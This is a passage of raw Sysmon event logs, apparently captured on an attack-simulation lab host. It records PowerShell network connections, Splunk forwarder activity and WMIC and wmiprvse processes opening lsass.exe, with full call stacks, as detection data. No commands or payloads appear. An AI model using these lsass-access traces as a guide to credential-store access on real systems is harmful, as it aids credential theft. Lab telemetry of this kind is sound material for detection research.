Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=51AE5CAD281C1F2CF0EE2B5E13361573,SHA256=0A057DF35C5FBF8E19CA680547FBD7D82F4B8AF4051CB4CC8D8B078AC7BE9AC9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085627Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:56.072{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56750-false10.0.1.12-8000- 23542300x800000000000000035085626Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:31.031{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92DBF4FFF53D9A3EEAF89E8A9CA5AA50,SHA256=84B74906FC7960BF5BE8D96978405C3B1D4DAD595DE4909D08BC575A95C6F724,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085628Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:32.032{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05A2570AA47FBC84ECF5406FF61F4BED,SHA256=6985D0F756B667ED34892FC7F8FB65421096B07535A14533EBE91DDE5253BA61,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085631Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:57.940{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56751-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085630Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:33.150{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A6F896D7B7E021380D42A9514C50DAF4,SHA256=C1887DBBA096C01C9684F3E069F8323D2CC8557B019BBD67F89E509CC038C32E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085629Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:33.065{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05A69553851B55C4923859D43F55B5BF,SHA256=9933C1FCA8AADEEC7ADCD7274912B41548D19CB3EEFD057528461B21610E800C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085632Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:34.083{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2347E01C850AD344D5BC20C3557B83A6,SHA256=4A1F35445DBBB51A18C1C1982F201016139CBC6D5143CC00049948484ACCFC37,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085633Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:35.101{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7755B20225BED2088D8253D96E569D9E,SHA256=8211345B117D6135498E451AA33D1C31AD96E6BFA98D4DCD74BB72113E4661AD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085635Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:36.433{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=108D8C4F62EB37696C2081F3B0A16092,SHA256=F849CE1C244024E310703F96D528D2F8A21C57D1DBCDEF5959D837B1B5E5EF13,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085634Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:36.131{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3D2B7F3152DF3D5A8230925E58C2956,SHA256=0FEEAED675A2BE0CB8CB346C1953474373B4CA41310F7ADC74FD4193B414B649,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085637Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:37.132{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F82E026AB067DD42DC0802F12F38C50,SHA256=5070010CDF47E3475F21D75484236C8AC3CBC1DFA0DDAF56C140CDBF9AC16AAC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085636Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:01.256{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56752-false10.0.1.12-8000- 23542300x800000000000000035085638Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:38.162{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1687212961B5E9BD1152466E6FD2C1CB,SHA256=4462F3B2963CC7964FD0F5BC386225DE0D9B51D7600DED1F22BE19176F656F2E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085641Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:03.941{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56753-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085640Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:39.183{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44C0D6C696391A19E93D35EB6CA3AAD7,SHA256=2BF0502AD1616B80C556918BC48C105B27E8D31072B9A821F70DF848AA31E0FB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085639Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:39.083{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=24E2C1F364FC131EA937D49A7FC280CF,SHA256=1A6F0D0EC1C54E6ACCF181E90D0E485880FCEDA4F121DA219B78FD832C341EBE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085642Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:40.198{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A70105F8F9599B2FB37449BC8789E068,SHA256=4F4B05BBD8DD327038781B696DBE6104943DBEB8835A011912F941AB311CF019,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085643Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:41.228{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6EB714D68731EB85528C30800787750,SHA256=FEAE94973F932AAF801A3709E3BEC5EAFB745E87100653473F45AA52BF8079F9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085668Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.995{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4F1A-613A-5B90-03000000C801}6804C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085667Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.995{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4F1A-613A-5B90-03000000C801}6804C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085666Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.980{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085665Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.980{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085664Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.980{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085663Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.977{B81B27B7-4013-611D-1600-00000000C801}11961436C:\Windows\system32\svchost.exe{B81B27B7-4F8A-613A-6D90-03000000C801}5444C:\Windows\System32\Wbem\WMIC.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085662Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.977{B81B27B7-4013-611D-1600-00000000C801}11961244C:\Windows\system32\svchost.exe{B81B27B7-4F8A-613A-6D90-03000000C801}5444C:\Windows\System32\Wbem\WMIC.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085661Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.958{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4F8A-613A-6D90-03000000C801}5444C:\Windows\System32\Wbem\WMIC.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085660Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.958{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4F8A-613A-6D90-03000000C801}5444C:\Windows\System32\Wbem\WMIC.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085659Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.958{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4F8A-613A-6D90-03000000C801}5444C:\Windows\System32\Wbem\WMIC.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085658Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.942{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-4F8A-613A-6D90-03000000C801}5444C:\Windows\System32\Wbem\WMIC.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085657Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.942{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085656Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.942{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085655Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.942{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085654Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.942{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085653Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.942{B81B27B7-4130-611D-9D00-00000000C801}31603808C:\Windows\system32\csrss.exe{B81B27B7-4F8A-613A-6D90-03000000C801}5444C:\Windows\System32\Wbem\WMIC.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085652Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.942{B81B27B7-4822-613A-788F-03000000C801}69404828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{B81B27B7-4F8A-613A-6D90-03000000C801}5444C:\Windows\System32\Wbem\WMIC.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f